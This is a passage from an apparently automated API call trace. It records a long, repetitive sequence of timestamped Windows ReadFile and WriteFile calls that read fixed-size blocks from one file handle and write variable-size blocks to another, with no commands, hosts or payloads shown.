lpOverlapped=0x0) returned 1 [0025.344] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.345] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.345] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.346] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.346] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.347] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.347] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x375, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.348] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.348] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.349] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.349] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.350] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.350] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x352, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.351] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.351] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.352] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.352] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.353] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xa9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.353] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.354] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x397, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.354] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.355] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.355] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.356] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.356] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.357] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x343, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.357] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.358] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.358] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.359] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.359] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.360] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.361] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.361] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.362] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.362] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.363] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.363] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.364] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.364] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.365] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.365] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.366] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.366] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.367] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3da, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.367] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.368] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.368] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.369] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.369] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.370] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.370] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.371] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.371] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.372] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.372] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.373] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.373] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.374] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.374] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.374] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.375] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.375] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.376] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x323, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.376] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.377] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.377] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.378] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.378] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x19b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.379] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.379] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.380] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x20e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.380] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.381] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.381] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ea, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.382] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.382] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.383] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.383] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.383] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.384] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.384] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.385] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.385] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.386] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x355, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.386] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.387] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.387] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.388] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.388] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.389] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x335, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.389] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.390] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.390] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.391] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.391] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x337, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.392] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.392] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.393] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.393] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, 